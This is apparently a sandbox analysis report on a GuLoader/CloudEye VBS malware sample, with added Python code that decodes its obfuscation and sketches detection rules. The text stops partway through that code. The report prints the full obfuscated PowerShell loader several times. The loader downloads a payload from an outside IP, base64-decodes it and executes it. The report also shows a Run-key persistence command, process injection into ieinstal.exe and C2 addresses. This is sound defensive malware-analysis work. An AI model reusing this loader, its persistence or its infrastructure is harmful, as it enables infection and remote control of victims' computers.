Analysis Overview
SHA256
82b08d87211f44c871d681e216fcd8ae33f485af2f6737011f187c5a56ac8c56
Threat Level: Known bad
The file Reylon.vbs was found to be: Known bad.
Malicious Activity Summary
Guloader,Cloudeye
Blocklisted process makes network request
Checks computer location settings
Checks QEMU agent file
Adds Run key to start application
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of NtCreateThreadExHideFromDebugger
Suspicious use of SetThreadContext
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-07-12 09:23
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-07-12 09:23
Reported
2023-07-12 09:26
Platform
win7-20230705-en
Max time kernel
148s
Max time network
136s
Command Line
Signatures
Guloader,Cloudeye
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
Checks QEMU agent file
| Description | Indicator | Process | Target |
| File opened (read-only) | C:\Program Files\Qemu-ga\qemu-ga.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened (read-only) | C:\Program Files\Qemu-ga\qemu-ga.exe | C:\Program Files (x86)\internet explorer\ieinstal.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-511725148-388773979-2853099937-1000\Software\Microsoft\Windows\CurrentVersion\Run | C:\Program Files (x86)\internet explorer\ieinstal.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-511725148-388773979-2853099937-1000\Software\Microsoft\Windows\CurrentVersion\Run\Kalibr = "%Della% -w 1 $Exostrad=(Get-ItemProperty -Path 'HKCU:\\Outglari\\').Part;%Della% ($Exostrad)" | C:\Program Files (x86)\internet explorer\ieinstal.exe | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\internet explorer\ieinstal.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\internet explorer\ieinstal.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\internet explorer\ieinstal.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2348 set thread context of 2668 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\internet explorer\ieinstal.exe |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\internet explorer\ieinstal.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Reylon.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Diskussi9 ([String]$Fibrocysto){For($Apha=1; $Apha -lt $Fibrocysto.Length-1; $Apha+=(1+1)){$Laeserfo=$Laeserfo+$Fibrocysto.Substring($Apha, 1)};$Laeserfo;}$Unconfe=Diskussi9 'Wh t t pB: /V/D1 9 4 . 5L5 .W2 2T4D.M1B8B3D/TmMrKk / SBtoySr t h jteM2 0S. p f m ';$Laeserfo01=Diskussi9 'SiLe xK ';$Egenfinan = Diskussi9 'H\Bs y s waorw 6M4A\KWLi nBd oMwUsUPPoAwAe rSSEhGeFl l \vv 1R. 0 \UpHoewSe rMsBhFeBl lK.IeSx eD ';.($Laeserfo01) (Diskussi9 'G$ OGvIe rR2 =S$ e nMv : wRiDnsd i rA ') ;.($Laeserfo01) (Diskussi9 ' $SE gSe nFfBiFn aDn = $SOSv eIrF2N+I$ E gFe nOf i nja n ') ;.($Laeserfo01) (Diskussi9 'H$FTboLn iae rNgDaPt eu M= (f( gGwEmBiU w iRnR3E2G_SpArBoRcUe sAsu -KFE MP rDo cGe s sDI dc=A$U{VP IHDB}P)U. C oDmPm aPnPdULUiVn eC) -As pFlSi tG V[Dc h aArU]U3R4T ');.($Laeserfo01) (Diskussi9 'V$ F o cvaIlHoA U=K $ETSoKn iSefrEgRaKtMe [M$ATIo n iReQrCgIaGt e .BcSoSu nUtC-M2L] ');.($Laeserfo01) (Diskussi9 'I$CKPa mBm e rHtA=B( THeFsVt -KPIaSt h S$BE gKe n fSiCn aSnC)B - AUn dL A(T[QIPn tAPItCrD]H:R:Rs iUz eE - e qF L8 )B ') ;if ($Kammert) {.$Egenfinan $Focalo;} else {;$Laeserfo00=Diskussi9 'BSRt aGr tC-IBKi tKsET r aBnSsSf eCr -RS o uFr cBe r$cU n c o nRf e -SD e sStMi n aFtSi o nC P$ OSvpeKrs2C ';.($Laeserfo01) (Diskussi9 ' $UORv eRrM2E= $Me nFvP: a pHpIdCaLt aM ') ;.($Laeserfo01) (Diskussi9 'IITm pDoAr tC- Meo dOudlSe RB iStksBT rDaBn s f eFrG ') ;$Over2=$Over2+'\Fattenl.Stu';while (-not $Webs) {.($Laeserfo01) (Diskussi9 'L$BW e bBs =F( TSe s t - PEaHtTh L$GODvOe rK2H)S ') ;.($Laeserfo01) $Laeserfo00;.($Laeserfo01) (Diskussi9 'dSBt a rut - SEl efeEpU 5R ');}.($Laeserfo01) (Diskussi9 ' $ID iTsSk uRs s i S=S MGPeStA- CFoSnSt eHn tB $BORv eLrR2R ');.($Laeserfo01) (Diskussi9 'U$DAFbWiSlTl apgTe b r = P[sS ytsStPePmF.TCPobnBvDe rDt ] :O: F r oCm BRaKsAeS6 4PS tHr i nBgS( $nD iNsEk uOsUsTiP)a ');.($Laeserfo01) (Diskussi9 ' $ L aCe s eBr f oL2 =P [SS yOsAtneLm .STke xRtP.ME njc oBdMiBnSgS] :T: AFSFCFISI .RGCe t S 
tCr i n g ( $PAFbEi lKl aEg e b rT) ');.($Laeserfo01) (Diskussi9 ' $VNPa t ulrWgK= $kLXaAeUs eCrCfeo 2I. sEu b s tGrWi nEgA( 2Z1 0T8B3D1F,L1L9S0 6T2 ) ');.($Laeserfo01) $Naturg;}"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Diskussi9 ([String]$Fibrocysto){For($Apha=1; $Apha -lt $Fibrocysto.Length-1; $Apha+=(1+1)){$Laeserfo=$Laeserfo+$Fibrocysto.Substring($Apha, 1)};$Laeserfo;}$Unconfe=Diskussi9 'Wh t t pB: /V/D1 9 4 . 5L5 .W2 2T4D.M1B8B3D/TmMrKk / SBtoySr t h jteM2 0S. p f m ';$Laeserfo01=Diskussi9 'SiLe xK ';$Egenfinan = Diskussi9 'H\Bs y s waorw 6M4A\KWLi nBd oMwUsUPPoAwAe rSSEhGeFl l \vv 1R. 0 \UpHoewSe rMsBhFeBl lK.IeSx eD ';.($Laeserfo01) (Diskussi9 'G$ OGvIe rR2 =S$ e nMv : wRiDnsd i rA ') ;.($Laeserfo01) (Diskussi9 ' $SE gSe nFfBiFn aDn = $SOSv eIrF2N+I$ E gFe nOf i nja n ') ;.($Laeserfo01) (Diskussi9 'H$FTboLn iae rNgDaPt eu M= (f( gGwEmBiU w iRnR3E2G_SpArBoRcUe sAsu -KFE MP rDo cGe s sDI dc=A$U{VP IHDB}P)U. C oDmPm aPnPdULUiVn eC) -As pFlSi tG V[Dc h aArU]U3R4T ');.($Laeserfo01) (Diskussi9 'V$ F o cvaIlHoA U=K $ETSoKn iSefrEgRaKtMe [M$ATIo n iReQrCgIaGt e .BcSoSu nUtC-M2L] ');.($Laeserfo01) (Diskussi9 'I$CKPa mBm e rHtA=B( THeFsVt -KPIaSt h S$BE gKe n fSiCn aSnC)B - AUn dL A(T[QIPn tAPItCrD]H:R:Rs iUz eE - e qF L8 )B ') ;if ($Kammert) {.$Egenfinan $Focalo;} else {;$Laeserfo00=Diskussi9 'BSRt aGr tC-IBKi tKsET r aBnSsSf eCr -RS o uFr cBe r$cU n c o nRf e -SD e sStMi n aFtSi o nC P$ OSvpeKrs2C ';.($Laeserfo01) (Diskussi9 ' $UORv eRrM2E= $Me nFvP: a pHpIdCaLt aM ') ;.($Laeserfo01) (Diskussi9 'IITm pDoAr tC- Meo dOudlSe RB iStksBT rDaBn s f eFrG ') ;$Over2=$Over2+'\Fattenl.Stu';while (-not $Webs) {.($Laeserfo01) (Diskussi9 'L$BW e bBs =F( TSe s t - PEaHtTh L$GODvOe rK2H)S ') ;.($Laeserfo01) $Laeserfo00;.($Laeserfo01) (Diskussi9 'dSBt a rut - SEl efeEpU 5R ');}.($Laeserfo01) (Diskussi9 ' $ID iTsSk uRs s i S=S MGPeStA- CFoSnSt eHn tB $BORv eLrR2R ');.($Laeserfo01) (Diskussi9 'U$DAFbWiSlTl apgTe b r = P[sS ytsStPePmF.TCPobnBvDe rDt ] :O: F r oCm BRaKsAeS6 4PS tHr i nBgS( $nD iNsEk uOsUsTiP)a ');.($Laeserfo01) (Diskussi9 ' $ L aCe s eBr f oL2 =P [SS yOsAtneLm .STke xRtP.ME njc oBdMiBnSgS] :T: AFSFCFISI .RGCe t S 
tCr i n g ( $PAFbEi lKl aEg e b rT) ');.($Laeserfo01) (Diskussi9 ' $VNPa t ulrWgK= $kLXaAeUs eCrCfeo 2I. sEu b s tGrWi nEgA( 2Z1 0T8B3D1F,L1L9S0 6T2 ) ');.($Laeserfo01) $Naturg;}"
C:\Program Files (x86)\internet explorer\ieinstal.exe
"C:\Program Files (x86)\internet explorer\ieinstal.exe"
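The Diskussi9 function at the head of both powershell.exe command lines is the only obfuscation layer on this stage: it keeps every second character of its argument (index 1, 3, 5, …, stopping before the last character) and discards the interleaved junk. The script then runs the decoded text through `.($Laeserfo01)`, whose own decoded value is `iex`. The following is an added example, not part of the sandbox report, that re-implements the decoder in Python and runs it over five `Diskussi9 '...'` arguments copied from the captured command line (the full script is on the page; only these fragments are embedded, and the `SAMPLE_CMDLINE` constant is a constructed input). One caveat worth knowing before reusing it: the rendered report collapses runs of spaces, and the decoder is parity-based, so any argument that originally contained two adjacent spaces decodes one character off. Prefer the raw command line from the sandbox's JSON export or a Sysmon Event ID 1 record when it is available.

```python
"""Decode the strings hidden by the Diskussi9() routine in the captured
PowerShell command line.

Added example, not part of the sandbox report. The decoder is rebuilt from
the captured function body; SAMPLE_CMDLINE is a constructed input made of
five Diskussi9 '...' arguments copied from the report.
"""
import re


def diskussi9(s: str) -> str:
    """Re-implementation of the captured decoder: keep every second
    character, starting at index 1 and stopping before the last one (the
    original loop runs while $Apha -lt $Fibrocysto.Length-1)."""
    return "".join(s[i] for i in range(1, len(s) - 1, 2))


# Constructed input: fragments copied verbatim from the report's command line.
# Runs of spaces may have been collapsed by the page rendering; these five
# decode cleanly, which is the check that they survived intact.
SAMPLE_CMDLINE = (
    "$Unconfe=Diskussi9 'Wh t t pB: /V/D1 9 4 . 5L5 .W2 2T4D.M1B8B3D/TmMrKk / SBtoySr t h jteM2 0S. p f m ';"
    "$Laeserfo01=Diskussi9 'SiLe xK ';"
    r"$Egenfinan = Diskussi9 'H\Bs y s waorw 6M4A\KWLi nBd oMwUsUPPoAwAe rSSEhGeFl l \vv 1R. 0 \UpHoewSe rMsBhFeBl lK.IeSx eD ';"
    ".($Laeserfo01) (Diskussi9 'G$ OGvIe rR2 =S$ e nMv : wRiDnsd i rA ') ;"
    ".($Laeserfo01) (Diskussi9 ' $VNPa t ulrWgK= $kLXaAeUs eCrCfeo 2I. sEu b s tGrWi nEgA( 2Z1 0T8B3D1F,L1L9S0 6T2 ) ');"
)

# The script never embeds a single quote inside an argument, so a
# non-greedy quoted match is enough.
ARG_RE = re.compile(r"Diskussi9 '([^']*)'")


def decode_all(cmdline: str) -> list:
    """Decoded form of every Diskussi9 '...' argument, in script order."""
    return [diskussi9(m.group(1)) for m in ARG_RE.finditer(cmdline)]


def deobfuscate(cmdline: str) -> str:
    """Rewrite the script with each Diskussi9 call replaced by its plaintext
    (as a single-quoted literal) and the iex alias spelled out, so the
    control flow can be read top to bottom."""
    script = ARG_RE.sub(lambda m: "'" + diskussi9(m.group(1)) + "'", cmdline)
    return script.replace(".($Laeserfo01)", "iex")


def extract_iocs(cmdline: str) -> dict:
    """Pull the download URL, the re-spawn path and the payload carve
    (substring offsets) out of the decoded strings."""
    decoded = decode_all(cmdline)
    return {
        "urls": [d for d in decoded if re.match(r"https?://", d)],
        "paths": [d for d in decoded if re.search(r"\\[\w.]+\.exe$", d, re.I)],
        "substring_calls": [d for d in decoded if ".substring(" in d.lower()],
    }


if __name__ == "__main__":
    for line in decode_all(SAMPLE_CMDLINE):
        print(line)
    print(extract_iocs(SAMPLE_CMDLINE))
```

The decoded values line up with the rest of the report: the URL's host is the `194.55.224.183:80` destination in the Network table, the `\syswow64\...\powershell.exe` path is what the 64-bit PowerShell re-launches (the second powershell.exe row), and the substring call is the carve applied to the base64-decoded `Fattenl.Stu` before the final `iex`.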
Network
| Country | Destination | Domain | Proto |
| TR | 194.55.224.183:80 | 194.55.224.183 | tcp |
| TR | 194.55.224.183:80 | 194.55.224.183 | tcp |
| TR | 194.55.224.183:80 | 194.55.224.183 | tcp |
| US | 8.8.8.8:53 | top.abuse1disabled.xyz | udp |
| NL | 134.19.179.139:5631 | top.abuse1disabled.xyz | tcp |
| US | 8.8.8.8:53 | sub.abuse2disabled.xyz | udp |
| US | 199.249.230.37:5631 | sub.abuse2disabled.xyz | tcp |
| DE | 38.242.234.206:5631 | | tcp |
| US | 8.8.8.8:53 | geoplugin.net | udp |
| NL | 178.237.33.50:80 | geoplugin.net | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\Cab765B.tmp
| MD5 | 3ac860860707baaf32469fa7cc7c0192 |
| SHA1 | c33c2acdaba0e6fa41fd2f00f186804722477639 |
| SHA256 | d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904 |
| SHA512 | d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c |
memory/564-74-0x00000000026E0000-0x0000000002760000-memory.dmp
memory/564-75-0x000000001B420000-0x000000001B702000-memory.dmp
memory/564-76-0x0000000001F40000-0x0000000001F48000-memory.dmp
memory/564-77-0x00000000026E0000-0x0000000002760000-memory.dmp
memory/564-78-0x00000000026E0000-0x0000000002760000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0S6AHN3HR5DX9LVALPHG.temp
| MD5 | 271ae57e5fe7ec7130268737b82214b5 |
| SHA1 | be8854b23b036dc02c441b7975f0d3c5291f1213 |
| SHA256 | fd950c53f966e28f87c20d132f718a54534709640e4e6a5c79fb5a8ca42a83ac |
| SHA512 | a3f9777fa851e5248cba54dd54ee5456d58abe07cc644ae6df6f7d5fd1a8df150b5eaeda76d128a7b0a9f0801156ac203bfe2808b3aa2d99f0128abea2a7a699 |
memory/2348-82-0x00000000026B0000-0x00000000026F0000-memory.dmp
memory/2348-81-0x00000000026B0000-0x00000000026F0000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 770d8350daae6c7f2b5b25ca43f3522a |
| SHA1 | c96b106e2d7bba04ba7c36458739a8825d42a189 |
| SHA256 | a771ab56702938dc05d65cebb57c6697b5ce152330222abc36775107e131d0ab |
| SHA512 | 421a70e8b4c4ef6182d542c622a5139c820d1bfe58ab8bcc3240f62263cc5c6df16a68319e144930f5320f9cb2e9242d9c60e6ba7b71f4f9ee7f84486c2db084 |
C:\Users\Admin\AppData\Local\Temp\TarBC6E.tmp
| MD5 | 4ff65ad929cd9a367680e0e5b1c08166 |
| SHA1 | c0af0d4396bd1f15c45f39d3b849ba444233b3a2 |
| SHA256 | c8733c93cc5aaf5ca206d06af22ee8dbdec764fb5085019a6a9181feb9dfdee6 |
| SHA512 | f530dc0d024a5a3b8903ffaaa41b608a5ccdd6da4ba1949f2c2e55a9fca475fec5c8d2119b5763cabe7ef1c3788fb9dcac621869db51d65b1d83cfe404fb4c27 |
memory/564-93-0x00000000026E0000-0x0000000002760000-memory.dmp
memory/564-94-0x00000000026E0000-0x0000000002760000-memory.dmp
memory/564-95-0x00000000026E0000-0x0000000002760000-memory.dmp
memory/2348-97-0x00000000026B0000-0x00000000026F0000-memory.dmp
memory/2348-98-0x00000000026B0000-0x00000000026F0000-memory.dmp
memory/2348-96-0x00000000026B0000-0x00000000026F0000-memory.dmp
memory/2348-99-0x0000000005F60000-0x0000000009927000-memory.dmp
memory/2348-100-0x0000000005010000-0x0000000005011000-memory.dmp
memory/2668-103-0x0000000000C20000-0x00000000045E7000-memory.dmp
memory/2668-104-0x0000000000C20000-0x00000000045E7000-memory.dmp
memory/2668-106-0x0000000000C20000-0x00000000045E7000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2023-07-12 09:23
Reported
2023-07-12 09:26
Platform
win10v2004-20230703-en
Max time kernel
150s
Max time network
152s
Command Line
Signatures
Guloader,Cloudeye
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
Checks QEMU agent file
| Description | Indicator | Process | Target |
| File opened (read-only) | C:\Program Files\Qemu-ga\qemu-ga.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened (read-only) | C:\Program Files\Qemu-ga\qemu-ga.exe | C:\Program Files (x86)\internet explorer\ieinstal.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000\Software\Microsoft\Windows\CurrentVersion\Run | C:\Program Files (x86)\internet explorer\ieinstal.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Kalibr = "%Della% -w 1 $Exostrad=(Get-ItemProperty -Path 'HKCU:\\Outglari\\').Part;%Della% ($Exostrad)" | C:\Program Files (x86)\internet explorer\ieinstal.exe | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\internet explorer\ieinstal.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\internet explorer\ieinstal.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\internet explorer\ieinstal.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1580 set thread context of 3368 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\internet explorer\ieinstal.exe |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\internet explorer\ieinstal.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Reylon.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Diskussi9 ([String]$Fibrocysto){For($Apha=1; $Apha -lt $Fibrocysto.Length-1; $Apha+=(1+1)){$Laeserfo=$Laeserfo+$Fibrocysto.Substring($Apha, 1)};$Laeserfo;}$Unconfe=Diskussi9 'Wh t t pB: /V/D1 9 4 . 5L5 .W2 2T4D.M1B8B3D/TmMrKk / SBtoySr t h jteM2 0S. p f m ';$Laeserfo01=Diskussi9 'SiLe xK ';$Egenfinan = Diskussi9 'H\Bs y s waorw 6M4A\KWLi nBd oMwUsUPPoAwAe rSSEhGeFl l \vv 1R. 0 \UpHoewSe rMsBhFeBl lK.IeSx eD ';.($Laeserfo01) (Diskussi9 'G$ OGvIe rR2 =S$ e nMv : wRiDnsd i rA ') ;.($Laeserfo01) (Diskussi9 ' $SE gSe nFfBiFn aDn = $SOSv eIrF2N+I$ E gFe nOf i nja n ') ;.($Laeserfo01) (Diskussi9 'H$FTboLn iae rNgDaPt eu M= (f( gGwEmBiU w iRnR3E2G_SpArBoRcUe sAsu -KFE MP rDo cGe s sDI dc=A$U{VP IHDB}P)U. C oDmPm aPnPdULUiVn eC) -As pFlSi tG V[Dc h aArU]U3R4T ');.($Laeserfo01) (Diskussi9 'V$ F o cvaIlHoA U=K $ETSoKn iSefrEgRaKtMe [M$ATIo n iReQrCgIaGt e .BcSoSu nUtC-M2L] ');.($Laeserfo01) (Diskussi9 'I$CKPa mBm e rHtA=B( THeFsVt -KPIaSt h S$BE gKe n fSiCn aSnC)B - AUn dL A(T[QIPn tAPItCrD]H:R:Rs iUz eE - e qF L8 )B ') ;if ($Kammert) {.$Egenfinan $Focalo;} else {;$Laeserfo00=Diskussi9 'BSRt aGr tC-IBKi tKsET r aBnSsSf eCr -RS o uFr cBe r$cU n c o nRf e -SD e sStMi n aFtSi o nC P$ OSvpeKrs2C ';.($Laeserfo01) (Diskussi9 ' $UORv eRrM2E= $Me nFvP: a pHpIdCaLt aM ') ;.($Laeserfo01) (Diskussi9 'IITm pDoAr tC- Meo dOudlSe RB iStksBT rDaBn s f eFrG ') ;$Over2=$Over2+'\Fattenl.Stu';while (-not $Webs) {.($Laeserfo01) (Diskussi9 'L$BW e bBs =F( TSe s t - PEaHtTh L$GODvOe rK2H)S ') ;.($Laeserfo01) $Laeserfo00;.($Laeserfo01) (Diskussi9 'dSBt a rut - SEl efeEpU 5R ');}.($Laeserfo01) (Diskussi9 ' $ID iTsSk uRs s i S=S MGPeStA- CFoSnSt eHn tB $BORv eLrR2R ');.($Laeserfo01) (Diskussi9 'U$DAFbWiSlTl apgTe b r = P[sS ytsStPePmF.TCPobnBvDe rDt ] :O: F r oCm BRaKsAeS6 4PS tHr i nBgS( $nD iNsEk uOsUsTiP)a ');.($Laeserfo01) (Diskussi9 ' $ L aCe s eBr f oL2 =P [SS yOsAtneLm .STke xRtP.ME njc oBdMiBnSgS] :T: AFSFCFISI .RGCe t S 
tCr i n g ( $PAFbEi lKl aEg e b rT) ');.($Laeserfo01) (Diskussi9 ' $VNPa t ulrWgK= $kLXaAeUs eCrCfeo 2I. sEu b s tGrWi nEgA( 2Z1 0T8B3D1F,L1L9S0 6T2 ) ');.($Laeserfo01) $Naturg;}"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Diskussi9 ([String]$Fibrocysto){For($Apha=1; $Apha -lt $Fibrocysto.Length-1; $Apha+=(1+1)){$Laeserfo=$Laeserfo+$Fibrocysto.Substring($Apha, 1)};$Laeserfo;}$Unconfe=Diskussi9 'Wh t t pB: /V/D1 9 4 . 5L5 .W2 2T4D.M1B8B3D/TmMrKk / SBtoySr t h jteM2 0S. p f m ';$Laeserfo01=Diskussi9 'SiLe xK ';$Egenfinan = Diskussi9 'H\Bs y s waorw 6M4A\KWLi nBd oMwUsUPPoAwAe rSSEhGeFl l \vv 1R. 0 \UpHoewSe rMsBhFeBl lK.IeSx eD ';.($Laeserfo01) (Diskussi9 'G$ OGvIe rR2 =S$ e nMv : wRiDnsd i rA ') ;.($Laeserfo01) (Diskussi9 ' $SE gSe nFfBiFn aDn = $SOSv eIrF2N+I$ E gFe nOf i nja n ') ;.($Laeserfo01) (Diskussi9 'H$FTboLn iae rNgDaPt eu M= (f( gGwEmBiU w iRnR3E2G_SpArBoRcUe sAsu -KFE MP rDo cGe s sDI dc=A$U{VP IHDB}P)U. C oDmPm aPnPdULUiVn eC) -As pFlSi tG V[Dc h aArU]U3R4T ');.($Laeserfo01) (Diskussi9 'V$ F o cvaIlHoA U=K $ETSoKn iSefrEgRaKtMe [M$ATIo n iReQrCgIaGt e .BcSoSu nUtC-M2L] ');.($Laeserfo01) (Diskussi9 'I$CKPa mBm e rHtA=B( THeFsVt -KPIaSt h S$BE gKe n fSiCn aSnC)B - AUn dL A(T[QIPn tAPItCrD]H:R:Rs iUz eE - e qF L8 )B ') ;if ($Kammert) {.$Egenfinan $Focalo;} else {;$Laeserfo00=Diskussi9 'BSRt aGr tC-IBKi tKsET r aBnSsSf eCr -RS o uFr cBe r$cU n c o nRf e -SD e sStMi n aFtSi o nC P$ OSvpeKrs2C ';.($Laeserfo01) (Diskussi9 ' $UORv eRrM2E= $Me nFvP: a pHpIdCaLt aM ') ;.($Laeserfo01) (Diskussi9 'IITm pDoAr tC- Meo dOudlSe RB iStksBT rDaBn s f eFrG ') ;$Over2=$Over2+'\Fattenl.Stu';while (-not $Webs) {.($Laeserfo01) (Diskussi9 'L$BW e bBs =F( TSe s t - PEaHtTh L$GODvOe rK2H)S ') ;.($Laeserfo01) $Laeserfo00;.($Laeserfo01) (Diskussi9 'dSBt a rut - SEl efeEpU 5R ');}.($Laeserfo01) (Diskussi9 ' $ID iTsSk uRs s i S=S MGPeStA- CFoSnSt eHn tB $BORv eLrR2R ');.($Laeserfo01) (Diskussi9 'U$DAFbWiSlTl apgTe b r = P[sS ytsStPePmF.TCPobnBvDe rDt ] :O: F r oCm BRaKsAeS6 4PS tHr i nBgS( $nD iNsEk uOsUsTiP)a ');.($Laeserfo01) (Diskussi9 ' $ L aCe s eBr f oL2 =P [SS yOsAtneLm .STke xRtP.ME njc oBdMiBnSgS] :T: AFSFCFISI .RGCe t S 
tCr i n g ( $PAFbEi lKl aEg e b rT) ');.($Laeserfo01) (Diskussi9 ' $VNPa t ulrWgK= $kLXaAeUs eCrCfeo 2I. sEu b s tGrWi nEgA( 2Z1 0T8B3D1F,L1L9S0 6T2 ) ');.($Laeserfo01) $Naturg;}"
C:\Program Files (x86)\internet explorer\ieinstal.exe
"C:\Program Files (x86)\internet explorer\ieinstal.exe"
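Both detonations show the same three-step chain: the 64-bit powershell.exe re-launches the identical script through the syswow64 copy, that 32-bit PowerShell starts ieinstal.exe with no arguments and then sets its thread context (the report's SetThreadContext row, PID 2348 into 2668 in behavioral1), and persistence is a Run value whose payload lives in a registry key rather than on disk. Below is an added example, not the sandbox's own signature logic, that replays those observations as triage rules over constructed process, thread-context and Run-key events modelled on the report. The PIDs 2348 and 2668 come from the SetThreadContext row; the other PIDs, all parent links, the truncated stand-in for the script text and the benign OneDrive Run value are assumptions made for the example.

```python
"""Triage rules for the behaviour recorded in the two detonations.

Added example, not part of the report or of any vendor tooling. The events
are constructed to mirror the report's Processes, SetThreadContext and
Run-key rows; PIDs other than 2348/2668, the parent links, the STAGE
stand-in and the OneDrive control value are assumed.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


@dataclass
class ThreadContextEvent:
    source_pid: int
    target_pid: int


@dataclass
class RunValue:
    name: str
    data: str


PS64 = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PS32 = r"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"
IEINSTAL = r"C:\Program Files (x86)\internet explorer\ieinstal.exe"
# Truncated stand-in for the captured script; both powershell.exe rows in the
# report carry the identical text, which is what rule 1 keys on.
STAGE = '"Function Diskussi9 ([String]$Fibrocysto){...}"'

PROCS = [  # constructed; PIDs 100 and 564 and every ppid are assumed
    ProcessEvent(100, 1, r"C:\Windows\System32\WScript.exe",
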